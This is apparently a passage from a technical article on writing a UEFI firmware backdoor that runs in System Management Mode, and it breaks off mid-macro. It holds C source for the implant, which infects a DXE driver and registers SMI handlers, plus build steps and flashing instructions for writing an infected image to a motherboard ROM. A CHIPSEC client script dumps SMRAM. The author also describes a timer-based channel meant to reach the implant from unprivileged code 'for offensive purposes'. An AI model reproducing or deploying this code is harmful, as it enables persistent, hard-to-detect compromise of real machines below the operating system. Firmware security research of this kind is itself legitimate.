EFI_SMM_SYSTEM_TABLE2 *gSmst = NULL;

BOOLEAN m_bInfectedImage = FALSE;
EFI_HANDLE m_ImageHandle = NULL;
PVOID m_ImageBase = NULL;
//--------------------------------------------------------------------------------------
PVOID BackdoorImageAddress(void)
{
    PVOID Addr = _get_addr();
    UINT64 Base = ALIGN_DOWN((UINT64)Addr, DEFAULT_EDK_ALIGN);

    // get current module base address by some address inside it
    while (*(PUSHORT)Base != EFI_IMAGE_DOS_SIGNATURE)
    {
        Base -= DEFAULT_EDK_ALIGN;
    }

    return (PVOID)Base;
}
//--------------------------------------------------------------------------------------
EFI_STATUS BackdoorImageCallRealEntry(
    PVOID Image,
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable)
{
    if (m_InfectorConfig.OriginalEntryPoint != 0)
    {
        EFI_IMAGE_ENTRY_POINT pEntry = (EFI_IMAGE_ENTRY_POINT)RVATOVA(
            Image, 
            m_InfectorConfig.OriginalEntryPoint
        );

        // call original entry point
        return pEntry(ImageHandle, SystemTable);
    }

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntryDxe(VOID)
{
    // DXE phase payload code goes here
    // ...
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    // SMM phase payload code goes here
    // ...
}
//--------------------------------------------------------------------------------------
EFI_STATUS
BackdoorEntryInfected(
    EFI_HANDLE ImageHandle,
    EFI_SYSTEM_TABLE *SystemTable)
{
    // get payload image address
    PVOID Base = BackdoorImageAddress();

    // update payload image base relocations
    LdrProcessRelocs(Base, Base);

    // after LdrProcessRelocs() call we can use global variables and data
    m_ImageBase = Base;

    // call original entry point of payload image
    return BackdoorEntry(
        ImageHandle,
        SystemTable
    );
}
//--------------------------------------------------------------------------------------
EFI_STATUS 
BackdoorEntry(
    IN EFI_HANDLE ImageHandle,
    IN EFI_SYSTEM_TABLE *SystemTable) 
{
    EFI_STATUS Ret = EFI_SUCCESS, Status = EFI_SUCCESS;
    BOOLEAN bInSmram = FALSE;
    PVOID Image = NULL;            

    EFI_LOADED_IMAGE *LoadedImage = NULL;   
    EFI_SMM_BASE2_PROTOCOL *SmmBase = NULL;    

    if (m_ImageHandle == NULL)
    {
        m_ImageHandle = ImageHandle;    

        gST = SystemTable;
        gBS = gST->BootServices;
        gRT = gST->RuntimeServices;           

        DbgMsg(__FILE__, __LINE__, "BackdoorEntry() called\r\n");

        // get current image information
        gBS->HandleProtocol(ImageHandle, &gEfiLoadedImageProtocolGuid, (VOID *)&LoadedImage);    
        
        if (m_ImageBase == NULL)
        {
            // payload image was loaded as standalone EFI application or driver
            m_bInfectedImage = FALSE;
            m_ImageBase = LoadedImage->ImageBase;

            DbgMsg(__FILE__, __LINE__, "Started as standalone driver/app\r\n");
        }
        else
        {
            // payload image was loaded as infector payload
            m_bInfectedImage = TRUE;

            DbgMsg(__FILE__, __LINE__, "Started as infector payload\r\n");
        }

        DbgMsg(__FILE__, __LINE__, "Image base address is "FPTR"\r\n", m_ImageBase);    
    }     

    Status = gBS->LocateProtocol(&gEfiSmmBase2ProtocolGuid, NULL, (PVOID *)&SmmBase);
    if (Status == EFI_SUCCESS)
    {
        // check if infected driver is running in SMM
        SmmBase->InSmm(SmmBase, &bInSmram);

        if (bInSmram)
        {
            DbgMsg(__FILE__, __LINE__, "Running in SMM\r\n");

            Status = SmmBase->GetSmstLocation(SmmBase, &gSmst);
            if (Status == EFI_SUCCESS)
            {
                DbgMsg(__FILE__, __LINE__, "SMM system table is at "FPTR"\r\n", gSmst);

                // run SMM specific code
                BackdoorEntrySmm();
            }   
            else
            {
                DbgMsg(__FILE__, __LINE__, "GetSmstLocation() fails: 0x%X\r\n", Status);
            }
        }                
    }

    if (!bInSmram)
    {
        // run DXE specific code
        BackdoorEntryDxe();
    }

    if (m_bInfectedImage)
    {
        // call original entry point of infected image
        Ret = BackdoorImageCallRealEntry(LoadedImage->ImageBase, ImageHandle, SystemTable);
    }    

    return Ret;
}
//--------------------------------------------------------------------------------------
// EoF
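
The base address lookup in BackdoorImageAddress() can be modelled outside of firmware. The following is a minimal Python sketch of the same idea, not the backdoor code itself: the ALIGN value is an assumed stand-in for DEFAULT_EDK_ALIGN, the "memory" is a plain byte array, and the lower bound check is an addition that the C loop does not have.

```python
import struct

DOS_SIGNATURE = 0x5A4D  # "MZ", the value of EFI_IMAGE_DOS_SIGNATURE
ALIGN = 0x1000          # assumption: stand-in for DEFAULT_EDK_ALIGN


def align_down(value, align):
    """Round value down to the nearest multiple of align (a power of two)."""
    return value & ~(align - 1)


def find_image_base(memory, addr, align=ALIGN):
    """Step backwards in align-sized steps until the MZ signature is found."""
    base = align_down(addr, align)
    while base >= 0:
        (signature,) = struct.unpack_from('<H', memory, base)
        if signature == DOS_SIGNATURE:
            return base
        base -= align
    raise ValueError('no DOS header found below 0x%x' % addr)


# toy "memory": an image whose header starts at offset 0x3000
memory = bytearray(0x8000)
memory[0x3000:0x3002] = b'MZ'

# some address inside the image, like the value returned by _get_addr()
print(hex(find_image_base(memory, 0x5123)))
```

The search only works because the image is loaded at an aligned address, so checking one 16-bit value per step is enough.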

To compile UEFI drivers I’m using the previously mentioned EDK2. Unfortunately, it fails to build on my OS X machine with compilation errors, so I compile the SMM backdoor driver on a Windows machine with Visual Studio 2008 installed.

First of all, we need to clone the EDK2 source tree from https://github.com/tianocore/edk2 and read the build instructions in the BuildNotes2.txt document. Then we need to edit the Conf/target.txt file and set the ACTIVE_PLATFORM property to OvmfPkg/OvmfPkgX64.dsc. The directory with the backdoor driver source code (SmmBackdoor) should be copied into the directory with the EDK2 source.

EDK2 uses its own makefile format; for our project we need a SmmBackdoor/SmmBackdoor.inf file with the following content:
# main settings
[defines]
  INF_VERSION = 0x00010005 
  BASE_NAME = SmmBackdoor
  FILE_GUID = 22D5AE41-147E-4C44-AE72-ECD9BBB455C1 # random one
  MODULE_TYPE = DXE_SMM_DRIVER
  ENTRY_POINT = BackdoorEntry

# C sources
[Sources]
  debug.c
  loader.c
  printf.c
  serial.c
  SmmBackdoor.c

# architecture-specific assembly sources
[Sources.X64]
  asm/amd64/common_asm.asm

# required EDK packages
[Packages]
  MdePkg/MdePkg.dec
  MdeModulePkg/MdeModulePkg.dec
  IntelFrameworkPkg/IntelFrameworkPkg.dec  
  IntelFrameworkModulePkg/IntelFrameworkModulePkg.dec  
  StdLib/StdLib.dec

# required EDK libraries
[LibraryClasses]
  UefiDriverEntryPoint
  UefiBootServicesTableLib
  DebugLib
  DevicePathLib
  SynchronizationLib

# required EDK protocols
[Protocols]
  gEfiSimpleTextOutProtocolGuid
  gEfiLoadedImageProtocolGuid
  gEfiSmmCpuProtocolGuid
  gEfiSmmBase2ProtocolGuid
  gEfiSmmAccess2ProtocolGuid
  gEfiSmmSwDispatch2ProtocolGuid
  gEfiSmmPeriodicTimerDispatch2ProtocolGuid
  gEfiDevicePathProtocolGuid
  gEfiSerialIoProtocolGuid  
 
# load order dependencies (none)
[Depex]
  TRUE

Also, you need to edit OvmfPkg/OvmfPkgX64.dsc and add the following lines at the end of the file:
  #
  # 3-rd party drivers
  #
  SmmBackdoor/SmmBackdoor.inf {
    <LibraryClasses>
      DebugLib|OvmfPkg/Library/PlatformDebugLibIoPort/PlatformDebugLibIoPort.inf
      MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf
  }

To compile the SmmBackdoor project:
  1. Run the Visual Studio 2008 Command Prompt and cd to the EDK2 directory.
  2. Execute Edk2Setup.bat --pull to configure the build environment and download the required binaries.
  3. cd SmmBackdoor && build
  4. After compilation, the resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/SmmBackdoor/SmmBackdoor/OUTPUT/SmmBackdoor.efi
To run SmmBackdoor.efi as an infector payload:
  1. Open the dumped flash image of the test motherboard in UEFITool.
  2. Extract the PE image of the FFS file with GUID = 26A2481E-4424-46A2-9943-CC4039EAD8F8.
  3. Infect the extracted image with SmmBackdoor.efi using the Python infector.
  4. In UEFITool, replace the original PE image with the infected one.
  5. Save the modified flash image to a file and write it to the motherboard ROM chip using flashrom and an SPI programmer, or in any other convenient way.

Debug messages


The tricky part of backdoor development was getting its debug output somehow. Basically, there are two ways to solve this task:
  • Write debug output to the COM port using I/O registers 3F8h-3FFh.
  • Write debug output to the screen using EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL.
The COM port of the Intel DQ77KB board is connected to a legacy port controller (Super I/O) that talks to the Q77 Platform Controller Hub (PCH) through the Low Pin Count (LPC) bus interface.

The problem is that the firmware initializes this controller at a relatively late stage of the DXE phase, so with the COM port alone we would not see any debug messages from BackdoorEntry() and the other functions that execute during SMM backdoor initialization. Of course, we could write code that configures the Super I/O controller manually, but such code would not be very reliable because there are too many different controller models with different configuration interfaces on the market.

EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL has similar problems: it's not available during infected image initialization, and it's not available during the runtime phase either (which is even more critical).

To deal with such unpleasant conditions I implemented debug message output in the following way:
  1. The DbgMsg() function prints each message to the screen and to the COM port whenever that is possible.
  2. If the display and console I/O are not initialized yet, DbgMsg() saves the message text into a global buffer.
  3. When EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL becomes available, the firmware calls a notification function that was registered during backdoor initialization; this function initializes backdoor console I/O and prints the saved messages from the global buffer.
This approach allows us to see DXE phase debug messages on the screen and receive runtime phase debug messages over the COM port. Of course, this solution is not the most convenient one, but it should work on a wide range of boards without depending on the load order of the infected image.
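
The buffering scheme above can be illustrated with a small model. This is only a Python sketch of the idea, assuming a single list as the "global buffer" and plain callables as output sinks; the class and method names are hypothetical and do not come from the backdoor sources.

```python
class DebugLog(object):
    """Buffers messages until an output sink is attached, then replays them."""

    def __init__(self):
        self.pending = []   # messages produced before any sink existed
        self.sinks = []     # callables that accept one string

    def msg(self, text):
        # print immediately when output is possible, otherwise keep the text
        if self.sinks:
            for sink in self.sinks:
                sink(text)
        else:
            self.pending.append(text)

    def on_console_ready(self, sink):
        """Notification callback: attach the sink and flush the backlog."""
        self.sinks.append(sink)
        for text in self.pending:
            sink(text)
        self.pending = []


screen = []                       # stands in for the text console
log = DebugLog()
log.msg('BackdoorEntry() called')  # too early, goes to the buffer
log.msg('Running in SMM')
log.on_console_ready(screen.append)
log.msg('SW SMI handler registered')
print(screen)
```

Messages keep their original order on the screen, which matters when early initialization output has to be read together with later messages.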

Example of on-screen debug messages in final version of SMM backdoor:


Communicating with SMM using SW SMI


Previously we talked only about the SMRAM initialization part of the SMM phase; the second important part is SMI dispatch. All SMI handlers of the UEFI SMM foundation and SMM protocols can be divided into three categories:
  • Root SMI controller handlers: the main handlers, registered by calling EFI_SMM_SYSTEM_TABLE2.SmiHandlerRegister() with a NULL value of HandlerType. These handlers are called on every SMI generated on the CPU. Usually, the root SMI handler code determines the interrupt source and calls the appropriate child SMI controller handler.
  • Child SMI controller handlers: each one handles a single interrupt source. SMM protocol drivers register such handlers by calling EFI_SMM_SYSTEM_TABLE2.SmiHandlerRegister() with a non-NULL value of HandlerType. The child handler of a specific SMM protocol calls the SMI handlers that were registered through this protocol's API.
  • SMI handlers: protocol-specific handlers that can be registered and unregistered by other SMM drivers.
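
The three levels above can be pictured as a simple two-stage lookup. The Python model below is only an illustration of that structure under simplified assumptions (one handler per registration context, string names for interrupt sources); none of the class names exist in EDK2.

```python
class ChildDispatcher(object):
    """Models one child SMI controller handler, e.g. the SW SMI dispatcher."""

    def __init__(self, source):
        self.source = source    # the single interrupt source this child owns
        self.handlers = {}      # registration context -> SMI handler

    def register(self, context, handler):
        self.handlers[context] = handler

    def dispatch(self, context):
        handler = self.handlers.get(context)
        return handler(context) if handler else None


class RootDispatcher(object):
    """Models the root SMI handler: runs on every SMI, picks the child."""

    def __init__(self):
        self.children = {}

    def add_child(self, child):
        self.children[child.source] = child

    def on_smi(self, source, context):
        child = self.children.get(source)
        return child.dispatch(context) if child else None


root = RootDispatcher()
sw = ChildDispatcher('sw')
root.add_child(sw)

# an SMM driver registers a handler for SW SMI value CCh
sw.register(0xCC, lambda value: 'handled SW SMI 0x%X' % value)

print(root.on_smi('sw', 0xCC))   # registered value reaches the handler
print(root.on_smi('sw', 0x01))   # nobody registered for this value
```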
Platform Initialization Specification defines the following SMM child dispatch protocols:
  • EFI_SMM_SW_DISPATCH2_PROTOCOL — Provides dispatch service for SMI that was generated by writing a value to APMC I/O port B2h.
  • EFI_SMM_SX_DISPATCH2_PROTOCOL — Provides dispatch service for ACPI Sx events.
  • EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL — Provides dispatch service for APIC timer events.
  • EFI_SMM_USB_DISPATCH2_PROTOCOL — Provides dispatch service for USB bus events.
  • EFI_SMM_GPI_DISPATCH2_PROTOCOL — Provides dispatch service for General Purpose Input (GPI) SMI source.
  • EFI_SMM_STANDBY_BUTTON_DISPATCH2_PROTOCOL — Provides dispatch service for standby button SMI source.
  • EFI_SMM_POWER_BUTTON_DISPATCH2_PROTOCOL — Provides dispatch service for power button SMI source.
  • EFI_SMM_IO_TRAP_DISPATCH2_PROTOCOL — Provides dispatch service for I/O instruction restart events.
Of course, not every firmware vendor implements all of these protocols, but most of them should be available on any UEFI compatible hardware.

The easiest way to communicate with the SMM backdoor is to trigger an SMI using I/O port B2h. EFI_SMM_SW_DISPATCH2_PROTOCOL allows us to register an SMI handler that will be called when code running under the operating system writes the handler number into this I/O port:
// software SMI handler number to communicate with the backdoor
#define BACKDOOR_SW_SMI_VAL 0xCC

// software SMI handler register context
EFI_SMM_SW_REGISTER_CONTEXT m_SwDispatch2RegCtx = { BACKDOOR_SW_SMI_VAL };

EFI_STATUS EFIAPI SwDispatch2Handler(
    EFI_HANDLE DispatchHandle,
    CONST VOID *Context,
    VOID *CommBuffer,
    UINTN *CommBufferSize)
{
    EFI_SMM_SW_CONTEXT *SwContext = (EFI_SMM_SW_CONTEXT *)CommBuffer;
    EFI_SMM_CPU_PROTOCOL *SmmCpu = NULL;
    EFI_STATUS Status = EFI_SUCCESS;

    DbgMsg(
        __FILE__, __LINE__, 
        __FUNCTION__"(): command port = 0x%X, data port = 0x%X\r\n",
        SwContext->CommandPort, SwContext->DataPort
    );

    // obtain SMM CPU protocol 
    Status = gSmst->SmmLocateProtocol(&gEfiSmmCpuProtocolGuid, NULL, (PVOID *)&SmmCpu);
    if (Status == EFI_SUCCESS)
    {
        UINT64 Rcx = 0;                

        // query RCX register value from CPU saved state
        Status = SmmCpu->ReadSaveState(
            SmmCpu, sizeof(Rcx), EFI_SMM_SAVE_STATE_REGISTER_RCX, 
            SwContext->SwSmiCpuIndex, (PVOID)&Rcx
        );
        if (EFI_ERROR(Status))
        {
            DbgMsg(__FILE__, __LINE__, "ReadSaveState() fails: 0x%X\r\n", Status);
            goto _end;
        }

        // handle backdoor request
        // ...
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "LocateProtocol() fails: 0x%X\r\n", Status);   
    }

_end:

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
EFI_STATUS EFIAPI SwDispatch2ProtocolNotifyHandler(
    CONST EFI_GUID *Protocol, 
    VOID *Interface, 
    EFI_HANDLE Handle)
{
    EFI_STATUS Status = EFI_SUCCESS;
    EFI_HANDLE DispatchHandle = NULL;

    // obtain target protocol
    EFI_SMM_SW_DISPATCH2_PROTOCOL *SwDispatch = (EFI_SMM_SW_DISPATCH2_PROTOCOL *)Interface;    

    DbgMsg(__FILE__, __LINE__, "Max. SW SMI value is 0x%X\r\n", SwDispatch->MaximumSwiValue);

    // register software SMI handler
    Status = SwDispatch->Register(
        SwDispatch, 
        SwDispatch2Handler, 
        &m_SwDispatch2RegCtx,
        &DispatchHandle
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(__FILE__, __LINE__, "SW SMI handler is at "FPTR"\r\n", SwDispatch2Handler);
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "Register() fails: 0x%X\r\n", Status);
    }

    return EFI_SUCCESS;   
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // register SMM protocol notification
    EFI_STATUS Status = gSmst->SmmRegisterProtocolNotify(
        &gEfiSmmSwDispatch2ProtocolGuid, 
        SwDispatch2ProtocolNotifyHandler, 
        &Registration
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(
            __FILE__, __LINE__, "SMM protocol notify handler is at "FPTR"\r\n",
            SwDispatch2ProtocolNotifyHandler
        );
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "RegisterProtocolNotify() fails: 0x%X\r\n", Status);
    }

    // ... skipped ...
}

As you can see, the backdoor code calls the EFI_SMM_SYSTEM_TABLE2.SmmRegisterProtocolNotify() function to be notified when EFI_SMM_SW_DISPATCH2_PROTOCOL becomes available. The notification handler calls the EFI_SMM_SW_DISPATCH2_PROTOCOL.Register() function to register an SMI handler that will be called when the value CCh is written to I/O port B2h. The SMI handler uses EFI_SMM_CPU_PROTOCOL to get CPU register values from the saved execution state.

Now that we can communicate with the backdoor, let’s implement some payload. The most obviously useful thing we can do from SMM is to provide an interface to the outside world for dumping SMRAM contents. I designed this interface in the following way:
  1. During initialization the backdoor calls EFI_BOOT_SERVICES.AllocatePages() with the EfiRuntimeServicesData value of the MemoryType argument to allocate 2000h bytes of physical memory that will be available during the DXE and runtime phases.
  2. The backdoor stores the address of this memory in a firmware variable with a constant name, so the operating system can obtain the address using the EFI_RUNTIME_SERVICES.GetVariable() function. Windows provides access to firmware variables through the GetFirmwareEnvironmentVariable() function of kernel32.dll or the ExGetFirmwareEnvironmentVariable() function of the NT kernel. On Linux firmware variables are available as pseudo-files in the /sys/firmware/efi/efivars (or /sys/firmware/efi/vars) directory, which can also be mounted at another location using mount -t efivarfs none /some/path.
  3. Non-SMM code stores the address of the memory page to dump in the RCX register and triggers an SMI by writing the constant command number to I/O port B2h.
  4. The SwDispatch2Handler() backdoor function copies the contents of the memory page at the specified address to the previously allocated memory and exits from SMM.
  5. After the SMI has been handled, non-SMM code queries the address of the physical memory allocated by the backdoor from the firmware variable and reads the contents of the dumped memory.
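
For step 2 on Linux, the variable can also be read without any extra tooling. Below is a minimal Python sketch, assuming the variable holds a single 64-bit address and is exposed through efivarfs, where each file starts with a 4-byte attributes field followed by the variable data. The helper names are hypothetical; the variable name is the one used by the client script later in this article.

```python
import os
import struct

EFIVARS_DIR = '/sys/firmware/efi/efivars'

# variable in efivarfs "Name-GUID" form, as used by the client script
BACKDOOR_INFO_EFI_VAR = 'SmmBackdoorInfo-3a452e85-a7ca-438f-a5cb-ad3a70c5d01b'


def parse_efivarfs(raw):
    """Split the contents of an efivarfs file into (attributes, value)."""
    if len(raw) < 4:
        raise ValueError('efivarfs file is too short')
    (attributes,) = struct.unpack('<I', raw[:4])
    return attributes, raw[4:]


def parse_info_addr(raw):
    """Decode the 64-bit physical address stored in the variable."""
    _, value = parse_efivarfs(raw)
    if len(value) != 8:   # assumption: the variable is exactly one UINT64
        raise ValueError('unexpected variable size: %d' % len(value))
    (addr,) = struct.unpack('<Q', value)
    return addr


def read_info_addr(efivars_dir=EFIVARS_DIR):
    """Read the address from a live system (usually requires root)."""
    path = os.path.join(efivars_dir, BACKDOOR_INFO_EFI_VAR)
    with open(path, 'rb') as fd:
        return parse_info_addr(fd.read())


# offline example with made-up attributes and a made-up address
sample = struct.pack('<IQ', 0x7, 0xDA5F0000)
print(hex(parse_info_addr(sample)))
```

Reading the physical memory at that address still needs a privileged interface, which is what CHIPSEC provides in the script below.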
To provide a bit more useful information to non-SMM code, the backdoor also stores the following structure at the beginning of the allocated memory:
typedef struct _BACKDOOR_INFO
{
    // number of SMI that was handled
    UINTN CallsCount;

    // EFI_STATUS of last operation
    UINTN BackdoorStatus;

    // List of structures with available SMRAM regions information.
    // Zero value of EFI_SMRAM_DESCRIPTOR.PhysicalStart means last item of list.
    EFI_SMRAM_DESCRIPTOR SmramMap[];

} BACKDOOR_INFO,
*PBACKDOOR_INFO;

To fill SmramMap field backdoor calls the EFI_SMM_ACCESS2_PROTOCOL.GetCapabilities() function that returns EFI_SMRAM_DESCRIPTOR structures with required information.

CHIPSEC, a firmware security assessment framework from Intel, provides a handy cross-platform Python API for different hardware and firmware features: reading of physical memory, EFI variables and PCI config space, SMI triggering, etc. Let’s write some backdoor communication code to utilize the SMRAM dumping feature:
import sys, os
from struct import pack, unpack

# path to the CHIPSEC folder
CHIPSEC_PATH = '/opt/chipsec/source/tool'

sys.path.append(CHIPSEC_PATH)

# SW SMI command value for communicating with backdoor SMM code
BACKDOOR_SW_SMI_VAL = 0xCC

# SW SMI commands for backdoor
BACKDOOR_SW_DATA_READ_PHYS_MEM  = 1 # read physical memory command

# EFI variable with struct _BACKDOOR_INFO physical address
BACKDOOR_INFO_EFI_VAR = 'SmmBackdoorInfo-3a452e85-a7ca-438f-a5cb-ad3a70c5d01b'
BACKDOOR_INFO_FMT = 'QQ'
BACKDOOR_INFO_LEN = 8 * 2

PAGE_SIZE = 0x1000

cs = None

class Chipsec(object):

    def __init__(self, uefi, mem, ints):

        self.uefi, self.mem, self.ints = uefi, mem, ints

def efi_var_get(name):

    # parse variable name string of name-GUID format
    name = name.split('-')

    return cs.uefi.get_EFI_variable(name[0], '-'.join(name[1:]), None)

# helpers for EFI variables with numeric value
efi_var_get_8 = lambda name: unpack('B', efi_var_get(name))[0]
efi_var_get_16 = lambda name: unpack('H', efi_var_get(name))[0]
efi_var_get_32 = lambda name: unpack('I', efi_var_get(name))[0]
efi_var_get_64 = lambda name: unpack('Q', efi_var_get(name))[0]

def mem_read(addr, size): 

    return cs.mem.read_phys_mem(addr, size)

# helpers to read numeric values from physical memory
mem_read_8 = lambda addr: unpack('B', mem_read(addr, 1))[0]
mem_read_16 = lambda addr: unpack('H', mem_read(addr, 2))[0]
mem_read_32 = lambda addr: unpack('I', mem_read(addr, 4))[0]
mem_read_64 = lambda addr: unpack('Q', mem_read(addr, 8))[0]

def get_backdoor_info_addr():

    # return address of the physical memory with BACKDOOR_INFO structure
    return efi_var_get_64(BACKDOOR_INFO_EFI_VAR)

def get_backdoor_info(addr = None):

    addr = get_backdoor_info_addr() if addr is None else addr

    # return BACKDOOR_INFO structure fields values
    return unpack(BACKDOOR_INFO_FMT, mem_read(addr, BACKDOOR_INFO_LEN))

def get_backdoor_info_mem(addr = None):

    addr = get_backdoor_info_addr() if addr is None else addr

    # return the raw data of the dumped memory page (second page of the allocated memory)
    return mem_read(addr + PAGE_SIZE, PAGE_SIZE)

def get_smram_info():

    ret = []  
    backdoor_info = get_backdoor_info_addr()  
    addr, size = backdoor_info + BACKDOOR_INFO_LEN, 8 * 4    

    # dump array of EFI_SMRAM_DESCRIPTOR structures
    while True:

        '''
            typedef struct _EFI_SMRAM_DESCRIPTOR 
            {
                EFI_PHYSICAL_ADDRESS PhysicalStart; 
                EFI_PHYSICAL_ADDRESS CpuStart; 
                UINT64 PhysicalSize; 
                UINT64 RegionState;

            } EFI_SMRAM_DESCRIPTOR;
        '''            
        physical_start, cpu_start, physical_size, region_state = \
            unpack('Q' * 4, mem_read(addr, size))            

        if physical_start == 0:

            # no more items
            break

        ret.append(( physical_start, physical_size, region_state ))
        addr += size

    return ret

def send_sw_smi(command, data, arg):

    # generate software SMI: command is written to port B2h, data to port B3h, arg is copied to RCX
    cs.ints.send_SW_SMI(command, data, 0, 0, arg, 0, 0, 0)

def dump_mem_page(addr, count = None):

    ret = ''
    backdoor_info = get_backdoor_info_addr()
    count = 1 if count is None else count    

    # dump specified amount of memory pages starting from addr
    for i in range(count):

        # send read memory page command to SMM code
        page_addr = addr + PAGE_SIZE * i
        send_sw_smi(BACKDOOR_SW_SMI_VAL, BACKDOOR_SW_DATA_READ_PHYS_MEM, page_addr)

        # read dumped page from physical memory
        _, last_status = get_backdoor_info(addr = backdoor_info)
        if last_status != 0:

            raise Exception('SMM backdoor error 0x%.8x' % last_status)

        ret += get_backdoor_info_mem(addr = backdoor_info)

    return ret

def dump_smram():

    try:

        contents = []

        print '[+] Dumping SMRAM regions, this may take a while...'

        # enumerate and dump available SMRAM regions
        for region in get_smram_info():        
            
            region_addr, region_size, _ = region
            name = 'SMRAM_dump_%.8x_%.8x.bin' % (region_addr, region_addr + region_size - 1)

            # dump region contents            
            data = dump_mem_page(region_addr, region_size / PAGE_SIZE)

            contents.append(( name, data ))

        # save dumped data to files
        for name, data in contents:

            with open(name, 'wb') as fd:

                print '[+] Creating', name
                fd.write(data)

        return True

    except IOError, why:

        print '[!]', str(why)
        return False

def chipsec_init():

    global cs

    # import CHIPSEC modules
    import chipsec.chipset
    import chipsec.hal.uefi
    import chipsec.hal.physmem
    import chipsec.hal.interrupts

    # initialize helper
    _cs = chipsec.chipset.cs()
    _cs.init(None, True)
    
    cs = Chipsec(chipsec.hal.uefi.UEFI(_cs.helper),
                 chipsec.hal.physmem.Memory(_cs.helper),
                 chipsec.hal.interrupts.Interrupts(_cs))

if __name__ == '__main__':
    
    chipsec_init()
    dump_smram()

I implemented a small program called SmmBackdoor.py that can infect extracted DXE drivers with the backdoor code and interact with an installed backdoor using software SMI. Available command line options:
  • SmmBackdoor.py --infect <source_path> --output <dest_path> --payload SmmBackdoor.efi — Infect PE image of DXE driver with backdoor code.
  • SmmBackdoor.py --test — check for backdoor presence and print status information from BACKDOOR_INFO structure.
  • SmmBackdoor.py --dump-smram — dump all available SMRAM regions into the files.
  • SmmBackdoor.py --read-phys <address> — print hexadecimal dump of physical memory page at given address.
  • SmmBackdoor.py --read-virt <address> — print hexadecimal dump of virtual memory page at given address.
Usage example — dumping CSEG and TSEG regions of SMRAM:


Probably, you have already noticed that the software SMI communication method has a serious limitation: we need to be root/Administrator to trigger an SMI and get access to physical memory. That's still fine if you are planning to use such a backdoor for research or reverse engineering, but for offensive purposes we need to find a better way to call the backdoor code, one that works at any privilege level.

Communicating with SMM using APIC timer


After studying the capabilities of the available SMM child dispatch protocols I figured out that EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL allows to configure the Advanced Programmable Interrupt Controller (APIC) timer to fire an SMI at specified time intervals, so it's possible to implement the following communication method:
  1. Non-SMM code copies the backdoor command arguments together with magic constants into CPU registers and enters an infinite loop.
  2. When the SMI timer handler that the backdoor registered with the EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL.Register() function is called, it checks the saved execution context for register values that match the magic constants. If they are found, it executes the specified command and modifies the saved instruction pointer value to let the non-SMM code leave the infinite loop.
  3. The backdoor can also do virtual to physical address translation to copy return data into a buffer that was passed from non-SMM code.
The client code for this method is simple enough and has no dependencies on any API or execution environment. It works at any privilege level, from sandboxed user mode applications to ring 0 code.
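
Step 2 can be modelled with a dictionary that plays the role of the CPU saved state. The Python sketch below is an illustration only: the magic constants and the status value are hypothetical placeholders (the real ones live in the backdoor sources), while the register roles and the MAX_JUMP_SIZE adjustment mirror the C handler shown in this section.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

# hypothetical placeholders, NOT the real BACKDOOR_SMM_CALL_R8_VAL/R9_VAL
MAGIC_R8 = 0x1111111111111111
MAGIC_R9 = 0x2222222222222222

MAX_JUMP_SIZE = 6          # same value as in the C handler
STATUS_UNSUPPORTED = 1     # hypothetical error code for unknown commands


def timer_smi_handler(saved_state, commands):
    """Model of one timer SMI; saved_state maps register names to values."""
    if saved_state['R8'] != MAGIC_R8 or saved_state['R9'] != MAGIC_R9:
        return False   # ordinary interrupted code, leave it untouched

    # RDI selects the command, RSI and RDX carry its arguments
    command = commands.get(saved_state['RDI'])
    if command is None:
        status = STATUS_UNSUPPORTED
    else:
        status = command(saved_state['RSI'], saved_state['RDX'])

    # return value for the caller, then release it from the loop
    saved_state['RAX'] = status & MASK64
    saved_state['RCX'] = (saved_state['RCX'] - MAX_JUMP_SIZE) & MASK64
    return True


state = {'R8': MAGIC_R8, 'R9': MAGIC_R9, 'RDI': 1, 'RSI': 0x1000, 'RDX': 0,
         'RAX': MASK64, 'RCX': 0x401006}
commands = {1: lambda arg1, arg2: 0}

print(timer_smi_handler(state, commands), hex(state['RAX']), hex(state['RCX']))
```

Two independent 64-bit magic values make it very unlikely that unrelated code is mistaken for a backdoor client when the timer fires.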

Backdoor code that registers the SMI timer handler:
// periodic timer global vars
EFI_HANDLE m_PeriodicTimerDispatchHandle = NULL;
EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL *m_PeriodicTimerDispatch = NULL;

/*
    SMM periodic timer registration context with Period and SmiTickInterval values.
    See the EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL description in volume 4
    of the Platform Initialization Specification for more information about them.
*/
EFI_SMM_PERIODIC_TIMER_REGISTER_CONTEXT m_PeriodicTimerDispatch2RegCtx = { 1000000, 640000 };

/*
    Structure that holds values of control registers from CPU saved state,
    these values are used in virtual to physical address translation code.
*/
typedef struct _CONTROL_REGS
{
    UINT64 Cr0, Cr3, Cr4;

} CONTROL_REGS,
*PCONTROL_REGS;

// macro to read register value from CPU execution state that was saved to SMRAM
#define READ_SAVE_STATE(_id_, _var_)                                                \
                                                                                    \
    Status = SmmCpu->ReadSaveState(SmmCpu,                                          \
        sizeof((_var_)), (_id_), gSmst->CurrentlyExecutingCpu, (PVOID)&(_var_));    \
                                                                                    \
    if (EFI_ERROR(Status))                                                          \
    {                                                                               \
        DbgMsg(__FILE__, __LINE__, "ReadSaveState() fails: 0x%X\r\n", Status);      \
        goto _end;                                                                  \
    }

// macro to modify register value of CPU execution state
#define WRITE_SAVE_STATE(_id_, _var_, _val_)                                        \
                                                                                    \
    (_var_) = (UINT64)(_val_);                                                      \
    Status = SmmCpu->WriteSaveState(SmmCpu,                                         \
